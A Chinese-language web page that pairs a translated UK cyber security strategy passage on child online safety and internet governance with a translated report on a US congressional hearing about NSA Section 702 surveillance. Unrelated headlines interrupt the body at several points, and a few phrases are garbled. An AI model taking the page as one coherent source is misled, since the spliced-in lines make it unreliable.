最后,我们还将确保在英国建立正确的监管框架,鼓励更高水平的网络安全保障机制,同时避免带来难以承受的业务负担。目前英国国内的诸多行业已经受到网络安全监管的保护,但对于更为广泛的经济领域,我们将在即将出台的“一般性数据保护监管”政策中引入强制性违约报告要求并显著提升最高罚款数额,从而推动网络风险管理能力的改进。我们亦将继续确保采取正确步骤——特别是配合工业战略绿皮书中提出的对于关键性国家基础设施的安全考量——以控制并管理网络安全风险。
儿童互联网安全
除了确保企业与个人能够在网络空间中安全生活与工作之外,我们还必须保护儿童与青少年免受网络内不当或有害资讯的影响,例如极端主义内容或者特定年龄段不适内容。
英国在儿童互联网安全方面走在世界前列,这主要是由于英国具备针对滥用及非法内容的法律保护条款,同时为家长提供工具以限制儿童远离不宜其接触的内容。我们在与互联网行业的合作方面拥有良好的过往表现。例如我们于2008年成立的英国儿童互联网安全委员会(简称UKCCIS)将政府与各相关者密切结合起来,旨在帮助儿童与青少年实现安全上网。
UKCCIS近期实现的成果包括:
·为大多数宽带客户提供适用于家庭的内容过滤工具,同时鼓励家长激活相关功能,并在儿童可能接触到的位置提供全年龄型公共WiFi。

《花少3》拼命保密吊胃口 没想被央视新闻揭底

·为社交媒体及互动服务(包括游戏)从业者提供指导,帮助他们确保自己的平台具备合理的18岁以下儿童及青少年保护能力。
我们一直在寻求更多途径以保护儿童免受在线恶意内容的危害。作为下一步举措,政府需要对在英国国内以商业方式提供在线色情资讯的服务商设置访问年龄控制——这部分内容目前极易甚至会在完全不受保护的情况下被儿童们所接触——旨在确保访问者的年龄段与其查看的内容相符。这些举措未来将获得一套健全监管制度的支持,最终保护儿童远离可能对其造成危害之内容。
我们还将继续与行业合作以努力消除各类新兴技术可能带来的儿童网络性剥削后果。我们在英国成立了世界领先的互联网观察基金会(简称IWF),旨在防止儿童性虐待图片的网络传播。政府已经与IWF开展合作,并同各主要技术公司共享近35000个与执法机构已经确定的儿童不雅图片相关的数字指纹或者“哈希”值,以便各企业能够从共平台及服务中删除相关图像。
我们还将继续在全球范围内的儿童性剥削行为打击工作中扮演领导者角色。2014年,我们建立了WePROTECT计划,其中汇集了多个国家、国家性组织以及大型企业,旨在协同应对与儿童性剥削相关的威胁活动。2016年,WePROTECT计划与全球反儿童性虐待网络联盟合并,首次创建了一个具备巨大影响力、专业知识与资源,且有能力在全球范围内处理在线儿童性剥削及虐待内容传播活动的国际性组织。我们还承诺向由儿童基金会主办的“消除暴力侵害儿童基金”捐赠4000万英镑,旨在进一步支持这项国际努力。
我们将继续带领世界应对网络激进化与极端主义活动带来的挑战。自2010年设立反恐互联网参照部门(Counter Terrorism Internet Referral Unit)以来,其已经帮助各企业清除了超过25万条有害的恐怖主义与极端主义内容,而这种控制模式已经开始在国际上获得广泛认可与采用。
一个开放的互联网

中科电气:获准列入三级保密资格单位名录

我们将继续与国际伙伴保持密切合作,确保继续建立一个自由、开放且安全的互联网环境,从而支持我们的经济繁荣与社会福祉。
英国与我们的盟友已经成功建立起一项广泛性共识,即多利益相关者共同参与才是管理互联网并治理其复杂性因素的最佳方式。然而,仍有部分人希望将互联网推向另一条道路,即由政府控制并以国家边界为基准重新划分网络空间。我们反对这种作法,并将继续在联合国及其它国际性组织当中发挥积极作用,从而加强多利益相关者参与模式,旨在确保互联网继续以开放的姿态迎接技术创新以及全球范围内的经济与社会发展。

美国国会质问NSA:你们到底在监控着多少美国民众?
虽然美国国家安全局(简称NSA)一直坚称其没有违背《外国情报监控法(简称FISA)》第702节的内容,但有一项证据却是其完全无法否认的——即存在相当一部分个人信息被其“偶然”窥探到的普通美国民众。
也正因为如此,NSA方面一直拒绝透露受到其监控的具体美国民众数量。
美国国会于3月2日召开了两轮众议院司法委员会会议,旨在审议去年12月提出的第702节内容重新授权事务。第一轮会议为各安全部门成员间的秘密会谈,第二轮会议则公开面向其他小组成员。
我们尚不清楚第一轮会议中取得了哪些进展,但在第二轮会议中,部分美国国会议员明确指出,NSA并没有提供确切的受监控美国国民数量估计——尽管司法委员会方面早在11个月之前就要求其给出正式说明。
美国司法委员会民主党领导人约翰·科尼斯(JohnConyers,来自密歇根州)指出,立法方一再要求对方提交相关数字,但“情报界并没有回应我们去年12月发出的要求函”——这封函件要求NSA最终确定提交估算数字的具体时间。
如何防范智能手机、平板电脑和可穿戴式设备成为互联网犯罪人员的跳板或肉鸡呢?
情报界则继续坚持认为,其很难在无需投入过多精力或者不侵犯对象隐私的用的是上,了解拨打电话或者发送邮件者的国籍。
吉姆·乔丹(Jim Jordan,来自俄亥俄州)宣称,“这样的说法在我看来似乎是种讽刺。这是全世界最伟大的情报机构,人们都相信他们能做到这一点。”
事实上,NSA方面之所以拒绝透露具体数字,是希望继续保留广泛的监督权力——凭借这一权力,其将能够将对主干互联网以及大型技术企业服务器农场的窥探活动解释为监督权。
第702节反复且明确指出,其只向相关机构提供对非美国公民及美国以外所发生之事件信息加以收集的权力。然而令人难以置信的是,安全机构对该法律条文进行了分层曲解,并借此授权其侵入位于美国本土的各企业系统。
而在美国国内间谍活动的惊人规模被曝光之后,NSA则含糊地以“偶然”与“意外”为借口解释其对美国公民数据的收集行为。也正因为如此,NSA方面才一直拒绝公布具体数字。
安全机构继续监控的理由?
在是否颠倒、黑白不分的政治环境之下,美国总检察长甚至能够对一个明确问题予以否认,并在事后声称其听到的实际上是另一个完全不同的问题——而这显然并非事实。考虑到这样的背景,大家也许不应再对听证会上出现的某些与现实不符的答案感到意外。
小组成员之一、美国海军学院助理教授杰夫·考瑟夫(Jeff Kosseff)认为,第四修正案(即不可在无搜查令的前提下进行无理由搜查)并不适用于第702节内容,因为后者涵盖了“外国情报”事务。
然而根据斯诺登所曝光文件指出——特别是与“棱镜门”相关之文件——安全机构一直在对国内电信流量进行监控。
同样令人难以置信的是,前NSA律师艾普莉尔·道斯(April Doss,现任Saul Ewing律师事务所合伙人)表示第702条内容只适用于“有针对性的监控”活动。虽然从法律意图层面讲这一解读不无道理,但实际情况恰恰相反——根据斯诺登文件中的内容,大量数据被提取至政府数据库内、得以保留而后进行搜索。
道斯还重复了NSA方面所持的观点,即如果要对当前广泛通信监控所覆盖到的美国民众数量进行统计,则会导致对其隐私的更为严重的侵犯。
也有部分国会议员认为不应将斯诺登曝光文件中的任何内容作为依据,因为这部分文件本身属于非法泄露的资料。
窥探“大量美国民众间通信内容”
在小组成员中,布伦南司法中心的伊丽莎白·戈廷(ElizabethGoitein)指出第702节内容通过一系列对法律的歪曲性解释被用于“收集大量美国民众间通信内容”这一糟糕现状,且最终将这种数据库内容搜索定性为美国国内“普通刑事诉讼”性质的例行检索。
她指出,“FBI方面正在阅读美国人的电子邮件、听取他们的电话,但却不具备任何对其加以怀疑的事实依据、更遑论搜查令。”
在意识到这一状况后,她通过一份提交至隐私与公民自由问题监督委员会(简称PCLOB,属于美国政府下辖的独立公民权益机构)的报告中给出了明确观点,即美国国会目前已经出现严重偏差,因为其于2014年批准了NSA提出的第215节通话监控计划(自这份报告提交以来,PCLOB董事会五名成员中的四名已经因无法依法履行职责等理由而辞职或者被拒绝续约)。
我们尚不清楚这些搜索活动对于美国刑事案件侦破工作的影响,因为NSA方面拒绝提供任何数据——理由还是一样,这会严重破坏第702条内容中强调的只应涉及国外情报工作的声明。
至于众议院司法委员会对这一说法的采信情况,民主、共和两党的多位成员表示不能接受NSA方面给出的上述解释。
泰德·卢(Ted Lieu,来自加利福尼亚州)指出,NSA对于美国民众通信内容的收集违反了第四修正案要求,而在对其内容进行扫描时产生了二次违规问题。考瑟夫则认为,数据收集本身有违第四修正案,而随后的内容扫描则并不涉及违规。
泰德·坡(Ted Poe,来自德克萨斯州)表示,他认为FBI在不具备搜查令的前提下进行数据库搜索属于“非法行为,有违宪法且存在滥用权力之嫌。”
罗尔-拉布拉多(Raúl Labrador,来自爱达荷州)担心这样一套系统可能被用于扭曲美国国内政治导向。他提到了最近曝出了的前任美国国家安全顾问迈克尔·弗林(Michael Flynn)就与俄罗斯大使会谈一事说谎,并指出这“对我来说是一种寒蝉效应,因为我认为政治对手完全可以利用我的个人信息对我实施打击。”
相关观点
尽管这项计划已经引发广泛反对,但美国国会仍可能在今年年底对第702节内容进行重新授权,这主要是担心终止该计划可能导致情报机构的信息收集能力受到严重打击。
这意味着其在很大程度上已经成为美国国会与安全机构之间在的一场博弈。目前议员们已经提出了一系列建议,希望探讨如何修改法律以消除这种严重的侵权行为。

左权县开展春季学校食堂食品安全知识培训

对相关法律进行年度审查——而非五年进行一次法律修订——有助于实现更理想的问责制度。另一种想法则是引入特别禁止条款,阻止利用第702节内容作为开展国内调查活动的依据。
由美国各大技术企业组成的“政府改革监察”小组提交了一份包含多项广泛建议的函件,具体包括:
·缩小第702节内容所限定的可收集信息类型范围。
·要求对第702节相关数据搜索活动进行司法监督。
·允许企业披露来自情报机构的数据提取请求。
·允许公开FISA法院令。
·在第702节适用范围内的数据搜索工作添加更多透明度因素。
听证会还针对如何在庞大数据库内根据存储信息计算相关美国民众的数量给出了广泛建议。有议员指出,美国电话号码往往以“+1”作为前缀,而互联网通信则通常对应一条IP地址——这将能够有效将通信位置与特定国家联系起来。
毫无疑问,美国NSA将据此逐步解决当前问题。

(内容来源:CNNVD 补天 天融信安全云服务中心 阿尔法实验室等相关国内热门安全论坛)
微信扫一扫关注该公众号

如果电子邮件指示您到一个网站地址,您要特别小心。如果您不确定它的真实性和可靠性,请勿点击和进行下载。

猜您喜欢

调查:云安全与IT系统漏洞管理成为IT决策者最关注
缺失的信息安全方针政策
面向企业员工的HSE基础知识扫盲式在线学习教程
政府工作报告放大招:博士研究生的补贴要涨了
RADFELLAS FALLSWAY
徘徊不前的BYOD